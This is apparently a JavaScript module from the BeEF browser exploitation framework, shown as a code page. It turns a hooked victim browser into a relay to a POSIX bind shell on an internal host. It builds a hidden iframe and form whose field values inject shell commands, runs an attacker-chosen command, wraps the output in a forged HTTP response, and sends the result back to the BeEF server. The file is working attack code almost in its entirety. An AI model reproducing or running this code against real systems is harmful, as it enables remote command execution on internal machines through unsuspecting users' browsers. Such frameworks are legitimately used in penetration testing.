Path: blob/master/modules/ipec/inter_protocol_posix_bindshell/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var target_ip = "<%= @ip %>";9var target_port = "<%= @port %>";10var cmd = '<%= @cmd %>';11var timeout = "<%= @command_timeout %>";12var internal_counter = 0;13var result_size = "<%= @result_size %>";1415// create iframe16var iframe = document.createElement("iframe");17iframe.setAttribute("id","ipc_posix_window_<%= @command_id %>");18iframe.setAttribute("style", "visibility:hidden;width:1px;height:1px;");19document.body.appendChild(iframe);2021// send a request22function send_cmds(ip, port, cmd, size) {2324var action = "http://" + ip + ":" + port + "/index.html?&/bin/sh;";25var parent = window.location.href;2627// create form28myform=document.createElement("form");29myform.setAttribute("name","data");30myform.setAttribute("method","post");31myform.setAttribute("enctype","multipart/form-data");32myform.setAttribute("action",action);33document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.document.body.appendChild(myform);3435body1="<html><body><div id='ipc_content'>";36body2="__END_OF_POSIX_IPC<%= @command_id %>__</div><s"+"cript>window.location='"+parent+"#ipc_result='+encodeURI(document.getElementById(\\\"ipc_content\\\").innerHTML);</"+"script></body></html>";3738// post results separator39myExt = document.createElement("INPUT");40myExt.setAttribute("id",<%= @command_id %>);41myExt.setAttribute("name",<%= @command_id %>);42myExt.setAttribute("value","echo -e HTTP/1.1 200 OK\\\\r;echo -e Content-Type: text/html\\\\r;echo -e Content-Length: "+(body1.length+cmd.length+body2.length+size*1)+"\\\\r;echo -e Keep-Alive: timeout=5,max=100\\\\r;echo -e Connection: keep-alive\\\\r;echo -e \\\\r;echo \""+body1+"\";(" + cmd + ")|head -c "+size+" ; ");43myform.appendChild(myExt);4445// Adding buffer space for the command result46end_talkback=" echo -e \""+body2;47while(--size) end_talkback+=" ";48end_talkback+="\" \\\\r ;";4950// post js to call home and close connection51myExt2 = document.createElement("INPUT");52myExt2.setAttribute("id","endTag");53myExt2.setAttribute("name","</div>");54myExt2.setAttribute("value",end_talkback);5556myform.appendChild(myExt2);57myform.submit();58}5960// wait <timeout> seconds for iframe url fragment to match #ipc_result=61function waituntilok() {6263try {64if (/#ipc_result=/.test(document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location)) {65ipc_result = document.getElementById("ipc_posix_window_<%= @command_id %>").contentWindow.location.href;66output = ipc_result.substring(ipc_result.indexOf('#ipc_result=')+12,ipc_result.lastIndexOf('__END_OF_POSIX_IPC<%= @command_id %>__'));67beef.net.send('<%= @command_url %>', <%= @command_id %>, "result="+decodeURI(output.replace(/%0A/gi, "<br>")).replace(/</g, "<").replace(/>/g, ">").replace(/<br>/gi, "<br>"));68document.body.removeChild(iframe);69return;70} else throw("command results haven't been returned yet");71} catch (e) {72internal_counter++;73if (internal_counter > timeout) {74beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timeout after '+timeout+' seconds');75document.body.removeChild(iframe);76return;77}78setTimeout(function() {waituntilok()},1000);79}80}8182// validate target83if (!target_port || !target_ip) {84beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed target host or target port');85} else if (!beef.net.is_valid_port(target_port)) {86beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid target port');87// send request and wait for reply88} else {89send_cmds(target_ip, target_port, cmd,result_size);90waituntilok();91}9293});94959697